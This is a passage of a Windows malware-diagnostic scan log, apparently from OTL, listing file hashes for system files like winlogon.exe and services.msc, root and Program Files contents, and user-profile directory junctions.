< MD5 for: SERVICES.LNK >
[2005/09/07 17:11:19 | 000,001,613 | ---- | M] () MD5=478D58FEF844E458F4509FD8A19620D6 -- C:\System Volume Information\SystemRestore\FRStaging\Old Computer\Services.lnk
[2014/05/26 05:05:47 | 000,001,639 | ---- | M] () MD5=6CF7DC1CB6217C982B0A0D51B210E0FD -- C:\Old Computer\Services.lnk
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
[2009/07/13 23:54:05 | 000,001,288 | ---- | M] () MD5=CA0D9F4743DFF86EBAF09D763139E958 -- C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk
< MD5 for: SERVICES.MOCHIADS.COM.SOL >
[2009/09/27 03:16:02 | 000,000,183 | ---- | M] () MD5=4DBA4EFD538E4B475B7E7055122C52B2 -- C:\Old Computer\services.mochiads.com.sol
< MD5 for: SERVICES.MOF >
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\SysNative\wbem\services.mof
[2009/06/10 15:44:06 | 000,002,866 | ---- | M] () MD5=26A11C895A7F0B6D32105EBE127D8500 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\services.mof
< MD5 for: SERVICES.MS_ >
[2002/08/29 14:00:00 | 000,003,649 | ---- | M] () MD5=64E9F61D2ED093C361862DE36433B5E1 -- C:\Old Computer\SERVICES.MS_
< MD5 for: SERVICES.MSC >
[2009/07/13 21:23:30 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\en-US\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysNative\services.msc
[2009/07/13 21:08:50 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\en-US\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\SysWOW64\services.msc
[2009/07/13 21:23:30 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_003408aa160fce5b\services.msc
[2009/06/10 15:38:36 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\amd64_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_2b58d44b5f6beb8a\services.msc
[2009/07/13 21:08:50 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-s..cessnapin.resources_31bf3856ad364e35_6.1.7600.16385_en-us_a4156d265db25d25\services.msc
[2009/06/10 16:21:09 | 000,092,745 | ---- | M] () MD5=7A1D35F59468B8118AF5B8E21DF78AE2 -- C:\Windows\winsxs\x86_microsoft-windows-servicessnapin_31bf3856ad364e35_6.1.7600.16385_none_cf3a38c7a70e7a54\services.msc
[2002/08/29 07:00:00 | 000,033,464 | ---- | M] () MD5=E8089AA2A6F7FEE89B38C1F2D77BA6C6 -- C:\Old Computer\services.msc
< MD5 for: SERVICES.PTXML >
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\SysNative\wdi\perftrack\Services.ptxml
[2009/07/13 15:16:17 | 000,001,061 | ---- | M] () MD5=640D7DD61B1CFA6C96F80F68F78CDFA7 -- C:\Windows\winsxs\amd64_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_2b54b20ee6fa07b1\Services.ptxml
< MD5 for: SERVICES.RDB >
[2012/08/13 10:51:02 | 000,178,348 | ---- | M] () MD5=039C8CFBD74EE07F38CD9E4C7D95C5C6 -- C:\Program Files (x86)\OpenOffice.org 3\Basis\program\services.rdb
[2012/08/13 10:51:02 | 000,000,453 | ---- | M] () MD5=3D2ADA15FEF5B5FF468243161543D610 -- C:\Program Files (x86)\OpenOffice.org 3\program\services.rdb
[2012/08/10 15:12:16 | 000,008,060 | ---- | M] () MD5=7CA7D7150EC46321162F932ADCF5F35B -- C:\Program Files (x86)\OpenOffice.org 3\URE\misc\services.rdb
< MD5 for: SERVICES.TICO >
[2002/04/02 23:39:26 | 000,002,038 | ---- | M] () MD5=B15FB3A60F5BA41109C6F94067C8DC62 -- C:\Old Computer\services.tico
< MD5 for: WINLOGON.ADML >
[2009/07/13 21:25:22 | 000,008,013 | ---- | M] () MD5=CED0EAD8D152B3D0F114698DE2316C5E -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-adm.resources_31bf3856ad364e35_6.1.7600.16385_en-us_f0f9032ef6930070\WinLogon.adml
< MD5 for: WINLOGON.ADMX >
[2009/06/10 16:04:41 | 000,005,237 | ---- | M] () MD5=89D8F50E186A16C2CED3CF36DBBC0B2C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-adm_31bf3856ad364e35_6.1.7600.16385_none_d7024e6992f3424d\WinLogon.admx
< MD5 for: WINLOGON.EX_ >
[2002/08/29 14:00:00 | 000,271,067 | ---- | M] () MD5=C73F996304F177262B0C2B70A7DCB66C -- C:\Old Computer\WINLOGON.EX_
< MD5 for: WINLOGON.EXE >
[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\System Volume Information\SystemRestore\FRStaging\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe
[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\ERDNT\cache64\winlogon.exe
[2010/11/20 08:25:30 | 000,390,656 | ---- | M] (Microsoft Corporation) MD5=1151B1BAA6F350B1DB6598E0FEA7C457 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_cde90685eb910636\winlogon.exe
[2009/07/13 20:39:52 | 000,389,120 | ---- | M] (Microsoft Corporation) MD5=132328DF455B0028F13BF0ABEE51A63A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16385_none_cbb7f2bdeea2829c\winlogon.exe
[2014/03/04 06:08:14 | 000,455,680 | ---- | M] (Microsoft Corporation) MD5=6CE2AE073BD21C542FC2C707CAE944CC -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.22616_none_ce748d1d04acf24f\winlogon.exe
[2014/03/04 04:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\SysNative\winlogon.exe
[2014/03/04 04:43:50 | 000,455,168 | ---- | M] (Microsoft Corporation) MD5=88AB9B72B4BF3963A0DE0820B4B0B06C -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.18409_none_cdf8bf35eb848572\winlogon.exe
[2014/04/03 09:49:02 | 000,742,200 | ---- | M] (MalwareBytes) MD5=96820649733BFB2B0499C371904B7B40 -- C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\Malwarebytes Anti-Malware\Chameleon\Windows\winlogon.exe
[2009/10/28 02:01:57 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=A93D41A4D4B0D91C072D11DD8AF266DE -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.20560_none_cc522fd507b468f8\winlogon.exe
[2014/05/30 08:12:06 | 001,940,216 | ---- | M] (Bleeping Computer, LLC) MD5=BA48F4C0988795FBEADAE23BE988054D -- C:\Users\Owner\Downloads\WiNlOgOn.exe
[2009/10/28 01:24:40 | 000,389,632 | ---- | M] (Microsoft Corporation) MD5=DA3E2A6FA9660CC75B471530CE88453A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7600.16447_none_cbe534e7ee8042ad\winlogon.exe
[2008/04/13 19:12:39 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\Old Computer\winlogon.exe
< MD5 for: WINLOGON.EXE.MUI >
[2010/11/20 08:00:25 | 000,023,040 | ---- | M] (Microsoft Corporation) MD5=34C7D2E30868EDAFB191341D963ABA5F -- C:\Windows\SysNative\en-US\winlogon.exe.mui
[2010/11/20 08:00:25 | 000,023,040 | ---- | M] (Microsoft Corporation) MD5=34C7D2E30868EDAFB191341D963ABA5F -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon.resources_31bf3856ad364e35_6.1.7601.17514_en-us_291e96fa1ab5fc7b\winlogon.exe.mui
[2009/07/13 21:29:52 | 000,022,528 | ---- | M] (Microsoft Corporation) MD5=56D03B64B8C483C1D12A8E4577B3B332 -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon.resources_31bf3856ad364e35_6.1.7600.16385_en-us_26ed83321dc778e1\winlogon.exe.mui
< MD5 for: WINLOGON.EXE-8163EECC.PF >
[2014/05/30 10:29:17 | 000,024,606 | ---- | M] () MD5=90A7DD1CF093EBB5930442F8FD2EBF17 -- C:\Windows\Prefetch\WINLOGON.EXE-8163EECC.pf
< MD5 for: WINLOGON.MFL >
[2009/07/13 21:27:22 | 000,001,080 | ---- | M] () MD5=2783ED50691284F7EAE6BE9729337E1A -- C:\Windows\SysNative\wbem\en-US\winlogon.mfl
[2009/07/13 21:27:22 | 000,001,080 | ---- | M] () MD5=2783ED50691284F7EAE6BE9729337E1A -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-mof.resources_31bf3856ad364e35_6.1.7600.16385_en-us_84afd4fd38ffd276\winlogon.mfl
< MD5 for: WINLOGON.MOF >
[2009/07/13 15:30:01 | 000,003,192 | ---- | M] () MD5=DF722B96F32A61783BC310FACF10240B -- C:\Windows\SysNative\wbem\winlogon.mof
[2009/07/13 15:30:01 | 000,003,192 | ---- | M] () MD5=DF722B96F32A61783BC310FACF10240B -- C:\Windows\winsxs\amd64_microsoft-windows-winlogon-mof_31bf3856ad364e35_6.1.7600.16385_none_dc2dbb778f98e40f\winlogon.mof
< MD5 for: WINLOGON.REG >
[2001/10/23 23:49:08 | 000,000,278 | ---- | M] () MD5=329635F24C2EB6E4B850598AC7CC7AA4 -- C:\Old Computer\winlogon.reg
< %SYSTEMDRIVE%\*.* >
[2009/10/02 18:10:22 | 000,000,622 | ---- | M] () -- C:\0
[2013/05/05 16:47:02 | 000,000,063 | ---- | M] () -- C:\1.html
[2014/04/20 20:05:28 | 000,000,040 | -H-- | M] () -- C:\28A87DD3C73F
[2013/04/27 21:05:37 | 000,000,448 | ---- | M] () -- C:\attach.ini
[2014/04/27 16:07:22 | 000,000,000 | ---- | M] () -- C:\autoexec.bat
[2010/11/20 07:40:07 | 000,383,786 | RHS- | M] () -- C:\bootmgr
[2010/03/29 21:41:54 | 000,008,192 | RHS- | M] () -- C:\BOOTSECT.BAK
[2010/03/30 18:34:14 | 000,000,125 | ---- | M] () -- C:\FINIS_IT.TXT
[2012/06/11 09:04:54 | 000,001,106 | -H-- | M] () -- C:\IPH.PH
[2013/04/25 21:34:13 | 000,000,005 | ---- | M] () -- C:\mail.ini
[2013/04/27 20:54:52 | 000,000,236 | ---- | M] () -- C:\mapui.ini
[2010/05/06 04:09:12 | 000,000,109 | ---- | M] () -- C:\mbam-error.txt
[2006/12/02 01:37:14 | 000,904,704 | ---- | M] (Microsoft Corporation) -- C:\msdia80.dll
[2013/04/26 20:16:30 | 000,000,029 | ---- | M] () -- C:\noticeui.ini
[2012/10/12 02:11:09 | 1363,148,790 | ---- | M] () -- C:\OC
[2014/05/30 10:50:57 | 4284,719,103 | -HS- | M] () -- C:\pagefile.sys
[2014/05/30 08:19:46 | 000,227,546 | ---- | M] () -- C:\TDSSKiller.3.0.0.37_30.05.2014_08.16.18_log.txt
[2012/04/28 16:42:21 | 000,000,050 | ---- | M] () -- C:\user.js
[2012/10/14 13:53:26 | 000,000,488 | ---- | M] () -- C:\WGH_CA_CHEATLOG.txt
[2012/10/13 19:05:43 | 000,001,114 | ---- | M] () -- C:\[CA]Config.ini
[2013/04/29 03:18:42 | 000,002,616 | ---- | M] () -- C:\{4271E4E0-922B-4162-BC7D-D77ABF10DA37}
[2013/07/22 04:37:31 | 000,002,208 | ---- | M] () -- C:\{AACA22D6-8109-43C9-B3A0-FE968E5993B7}
< %systemroot%\Fonts\*.com >
[2009/07/14 00:32:31 | 000,026,040 | ---- | M] () -- C:\Windows\Fonts\GlobalMonospace.CompositeFont
[2009/07/14 00:32:31 | 000,026,489 | ---- | M] () -- C:\Windows\Fonts\GlobalSansSerif.CompositeFont
[2009/07/14 00:32:31 | 000,029,779 | ---- | M] () -- C:\Windows\Fonts\GlobalSerif.CompositeFont
[2009/07/14 00:32:31 | 000,043,318 | ---- | M] () -- C:\Windows\Fonts\GlobalUserInterface.CompositeFont
< %systemroot%\Fonts\*.dll >
< %systemroot%\Fonts\*.ini >
[2009/06/10 15:49:50 | 000,000,065 | ---- | M] () -- C:\Windows\Fonts\desktop.ini
< %systemroot%\Fonts\*.ini2 >
< %systemroot%\Fonts\*.exe >
< %systemroot%\system32\spool\prtprocs\w32x86\*.* >
< %systemroot%\REPAIR\*.bak1 >
< %systemroot%\REPAIR\*.ini >
< %systemroot%\system32\*.jpg >
< %systemroot%\*.jpg >
< %systemroot%\*.png >
< %systemroot%\*.scr >
[2010/10/15 22:18:27 | 001,737,052 | ---- | M] () -- C:\Windows\HalloweenScreamsaver.scr
[2012/03/08 18:37:20 | 000,302,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\WLXPGSS.SCR
[3 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
< %systemroot%\*._sy >
< %APPDATA%\Adobe\Update\*.* >
< %ALLUSERSPROFILE%\Favorites\*.* >
< %APPDATA%\Microsoft\*.* >
< %PROGRAMFILES%\*.* >
[2010/12/04 12:43:27 | 230,797,822 | ---- | M] () -- C:\Program Files (x86)\Adobe Flash CS4.rar
[2010/11/06 10:13:06 | 242,254,547 | ---- | M] () -- C:\Program Files (x86)\Adobe Illustrator CS4.rar
[2009/07/13 23:54:24 | 000,000,174 | -HS- | M] () -- C:\Program Files (x86)\desktop.ini
[2014/05/25 19:23:07 | 004,296,192 | ---- | M] () -- C:\Program Files (x86)\SO.Booster
[2014/05/25 19:23:08 | 000,174,928 | ---- | M] () -- C:\Program Files (x86)\SOSvc.dll
[2014/05/25 19:23:08 | 004,210,176 | ---- | M] () -- C:\Program Files (x86)\SO_x64.Booster
< %APPDATA%\Update\*.* >
< %systemroot%\*. /mp /s >
< dir "%systemdrive%\*" /S /A:L /C >
Volume in drive C is HP
Volume Serial Number is 960A-5CE9
Directory of C:\
07/14/2009 00:08 <JUNCTION> Documents and Settings [C:\Users]
0 File(s) 0 bytes
Directory of C:\ProgramData
07/14/2009 00:08 <JUNCTION> Application Data [C:\ProgramData]
07/14/2009 00:08 <JUNCTION> Desktop [C:\Users\Public\Desktop]
07/14/2009 00:08 <JUNCTION> Documents [C:\Users\Public\Documents]
07/14/2009 00:08 <JUNCTION> Favorites [C:\Users\Public\Favorites]
07/14/2009 00:08 <JUNCTION> Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
07/14/2009 00:08 <JUNCTION> Templates [C:\ProgramData\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users
07/14/2009 00:08 <SYMLINKD> All Users [C:\ProgramData]
07/14/2009 00:08 <JUNCTION> Default User [C:\Users\Default]
0 File(s) 0 bytes
Directory of C:\Users\All Users
07/14/2009 00:08 <JUNCTION> Application Data [C:\ProgramData]
07/14/2009 00:08 <JUNCTION> Desktop [C:\Users\Public\Desktop]
07/14/2009 00:08 <JUNCTION> Documents [C:\Users\Public\Documents]
07/14/2009 00:08 <JUNCTION> Favorites [C:\Users\Public\Favorites]
07/14/2009 00:08 <JUNCTION> Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
07/14/2009 00:08 <JUNCTION> Templates [C:\ProgramData\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Classic .NET AppPool
04/27/2014 18:23 <JUNCTION> Application Data [C:\Users\Classic .NET AppPool\AppData\Roaming]
04/27/2014 18:23 <JUNCTION> Cookies [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Cookies]
04/27/2014 18:23 <JUNCTION> Local Settings [C:\Users\Classic .NET AppPool\AppData\Local]
04/27/2014 18:23 <JUNCTION> My Documents [C:\Users\Classic .NET AppPool\Documents]
04/27/2014 18:23 <JUNCTION> NetHood [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
04/27/2014 18:23 <JUNCTION> PrintHood [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
04/27/2014 18:23 <JUNCTION> Recent [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Recent]
04/27/2014 18:23 <JUNCTION> SendTo [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\SendTo]
04/27/2014 18:23 <JUNCTION> Start Menu [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Start Menu]
04/27/2014 18:23 <JUNCTION> Templates [C:\Users\Classic .NET AppPool\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Classic .NET AppPool\AppData\Local
04/27/2014 18:23 <JUNCTION> Application Data [C:\Users\Classic .NET AppPool\AppData\Local]
04/27/2014 18:23 <JUNCTION> History [C:\Users\Classic .NET AppPool\AppData\Local\Microsoft\Windows\History]
04/27/2014 18:23 <JUNCTION> Temporary Internet Files [C:\Users\Classic .NET AppPool\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Classic .NET AppPool\Documents
04/27/2014 18:23 <JUNCTION> My Music [C:\Users\Classic .NET AppPool\Music]
04/27/2014 18:23 <JUNCTION> My Pictures [C:\Users\Classic .NET AppPool\Pictures]
04/27/2014 18:23 <JUNCTION> My Videos [C:\Users\Classic .NET AppPool\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Default
07/14/2009 00:08 <JUNCTION> Application Data [C:\Users\Default\AppData\Roaming]
07/14/2009 00:08 <JUNCTION> Local Settings [C:\Users\Default\AppData\Local]
07/14/2009 00:08 <JUNCTION> My Documents [C:\Users\Default\Documents]
07/14/2009 00:08 <JUNCTION> NetHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
07/14/2009 00:08 <JUNCTION> PrintHood [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
07/14/2009 00:08 <JUNCTION> Recent [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent]
07/14/2009 00:08 <JUNCTION> SendTo [C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo]
07/14/2009 00:08 <JUNCTION> Start Menu [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu]
07/14/2009 00:08 <JUNCTION> Templates [C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Default\AppData\Local
07/14/2009 00:08 <JUNCTION> Application Data [C:\Users\Default\AppData\Local]
07/14/2009 00:08 <JUNCTION> History [C:\Users\Default\AppData\Local\Microsoft\Windows\History]
07/14/2009 00:08 <JUNCTION> Temporary Internet Files [C:\Users\Default\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Default\Documents
07/14/2009 00:08 <JUNCTION> My Music [C:\Users\Default\Music]
07/14/2009 00:08 <JUNCTION> My Pictures [C:\Users\Default\Pictures]
07/14/2009 00:08 <JUNCTION> My Videos [C:\Users\Default\Videos]
0 File(s) 0 bytes
Directory of C:\Users\DefaultAppPool
04/27/2014 18:29 <JUNCTION> Application Data [C:\Users\DefaultAppPool\AppData\Roaming]
04/27/2014 18:29 <JUNCTION> Cookies [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Cookies]
04/27/2014 18:29 <JUNCTION> Local Settings [C:\Users\DefaultAppPool\AppData\Local]
04/27/2014 18:29 <JUNCTION> My Documents [C:\Users\DefaultAppPool\Documents]
04/27/2014 18:29 <JUNCTION> NetHood [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
04/27/2014 18:29 <JUNCTION> PrintHood [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
04/27/2014 18:29 <JUNCTION> Recent [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Recent]
04/27/2014 18:29 <JUNCTION> SendTo [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\SendTo]
04/27/2014 18:29 <JUNCTION> Start Menu [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu]
04/27/2014 18:29 <JUNCTION> Templates [C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\DefaultAppPool\AppData\Local
04/27/2014 18:29 <JUNCTION> Application Data [C:\Users\DefaultAppPool\AppData\Local]
04/27/2014 18:29 <JUNCTION> History [C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\History]
04/27/2014 18:29 <JUNCTION> Temporary Internet Files [C:\Users\DefaultAppPool\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\DefaultAppPool\Documents
04/27/2014 18:29 <JUNCTION> My Music [C:\Users\DefaultAppPool\Music]
04/27/2014 18:29 <JUNCTION> My Pictures [C:\Users\DefaultAppPool\Pictures]
04/27/2014 18:29 <JUNCTION> My Videos [C:\Users\DefaultAppPool\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Mcx1-OWNER-PC
08/25/2011 03:33 <JUNCTION> Application Data [C:\Users\Mcx1-OWNER-PC\AppData\Roaming]
08/25/2011 03:33 <JUNCTION> Cookies [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Cookies]
08/25/2011 03:33 <JUNCTION> Local Settings [C:\Users\Mcx1-OWNER-PC\AppData\Local]
08/25/2011 03:33 <JUNCTION> My Documents [C:\Users\Mcx1-OWNER-PC\Documents]
08/25/2011 03:33 <JUNCTION> NetHood [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
08/25/2011 03:33 <JUNCTION> PrintHood [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
08/25/2011 03:33 <JUNCTION> Recent [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Recent]
08/25/2011 03:33 <JUNCTION> SendTo [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\SendTo]
08/25/2011 03:33 <JUNCTION> Start Menu [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Start Menu]
08/25/2011 03:33 <JUNCTION> Templates [C:\Users\Mcx1-OWNER-PC\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Mcx1-OWNER-PC\AppData\Local
08/25/2011 03:33 <JUNCTION> Application Data [C:\Users\Mcx1-OWNER-PC\AppData\Local]
08/25/2011 03:33 <JUNCTION> History [C:\Users\Mcx1-OWNER-PC\AppData\Local\Microsoft\Windows\History]
08/25/2011 03:33 <JUNCTION> Temporary Internet Files [C:\Users\Mcx1-OWNER-PC\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Mcx1-OWNER-PC\Documents
08/25/2011 03:33 <JUNCTION> My Music [C:\Users\Mcx1-OWNER-PC\Music]
08/25/2011 03:33 <JUNCTION> My Pictures [C:\Users\Mcx1-OWNER-PC\Pictures]
08/25/2011 03:33 <JUNCTION> My Videos [C:\Users\Mcx1-OWNER-PC\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Nick
03/30/2010 19:19 <JUNCTION> Application Data [C:\Users\Nick\AppData\Roaming]
03/30/2010 19:19 <JUNCTION> Cookies [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Cookies]
03/30/2010 19:19 <JUNCTION> Local Settings [C:\Users\Nick\AppData\Local]
03/30/2010 19:19 <JUNCTION> My Documents [C:\Users\Nick\Documents]
03/30/2010 19:19 <JUNCTION> NetHood [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
03/30/2010 19:19 <JUNCTION> PrintHood [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
03/30/2010 19:19 <JUNCTION> Recent [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Recent]
03/30/2010 19:19 <JUNCTION> SendTo [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\SendTo]
03/30/2010 19:19 <JUNCTION> Start Menu [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu]
03/30/2010 19:19 <JUNCTION> Templates [C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Nick\AppData\Local
03/30/2010 19:19 <JUNCTION> Application Data [C:\Users\Nick\AppData\Local]
03/30/2010 19:19 <JUNCTION> History [C:\Users\Nick\AppData\Local\Microsoft\Windows\History]
03/30/2010 19:19 <JUNCTION> Temporary Internet Files [C:\Users\Nick\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Nick\Documents
03/30/2010 19:19 <JUNCTION> My Music [C:\Users\Nick\Music]
03/30/2010 19:19 <JUNCTION> My Pictures [C:\Users\Nick\Pictures]
03/30/2010 19:19 <JUNCTION> My Videos [C:\Users\Nick\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Owner
03/29/2010 18:48 <JUNCTION> Application Data [C:\Users\Owner\AppData\Roaming]
03/29/2010 18:48 <JUNCTION> Cookies [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Cookies]
03/29/2010 18:48 <JUNCTION> Local Settings [C:\Users\Owner\AppData\Local]
03/29/2010 18:48 <JUNCTION> My Documents [C:\Users\Owner\Documents]
03/29/2010 18:48 <JUNCTION> NetHood [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
03/29/2010 18:48 <JUNCTION> PrintHood [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
03/29/2010 18:48 <JUNCTION> Recent [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Recent]
03/29/2010 18:48 <JUNCTION> SendTo [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\SendTo]
03/29/2010 18:48 <JUNCTION> Start Menu [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu]
03/29/2010 18:48 <JUNCTION> Templates [C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Users\Owner\AppData\Local
03/29/2010 18:48 <JUNCTION> Application Data [C:\Users\Owner\AppData\Local]
03/29/2010 18:48 <JUNCTION> History [C:\Users\Owner\AppData\Local\Microsoft\Windows\History]
03/29/2010 18:48 <JUNCTION> Temporary Internet Files [C:\Users\Owner\AppData\Local\Microsoft\Windows\Temporary Internet Files]
0 File(s) 0 bytes
Directory of C:\Users\Owner\Documents
03/29/2010 18:48 <JUNCTION> My Music [C:\Users\Owner\Music]
03/29/2010 18:48 <JUNCTION> My Pictures [C:\Users\Owner\Pictures]
03/29/2010 18:48 <JUNCTION> My Videos [C:\Users\Owner\Videos]
0 File(s) 0 bytes
Directory of C:\Users\Public\Documents
07/14/2009 00:08 <JUNCTION> My Music [C:\Users\Public\Music]
07/14/2009 00:08 <JUNCTION> My Pictures [C:\Users\Public\Pictures]
07/14/2009 00:08 <JUNCTION> My Videos [C:\Users\Public\Videos]
0 File(s) 0 bytes
Directory of C:\Windows\System32\config\systemprofile
04/03/2010 23:53 <JUNCTION> Application Data [C:\Windows\system32\config\systemprofile\AppData\Roaming]
04/03/2010 23:53 <JUNCTION> Local Settings [C:\Windows\system32\config\systemprofile\AppData\Local]
01/03/2012 02:48 <JUNCTION> My Documents [C:\Windows\system32\config\systemprofile\Documents]
01/03/2012 02:48 <JUNCTION> NetHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
01/03/2012 02:48 <JUNCTION> PrintHood [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
01/03/2012 02:48 <JUNCTION> Recent [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Recent]
01/03/2012 02:48 <JUNCTION> SendTo [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\SendTo]
10/02/2010 12:06 <JUNCTION> Start Menu [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu]
01/03/2012 02:48 <JUNCTION> Templates [C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Templates]
0 File(s) 0 bytes
Directory of C:\Windows\System32\config\systemprofile\AppData\Local
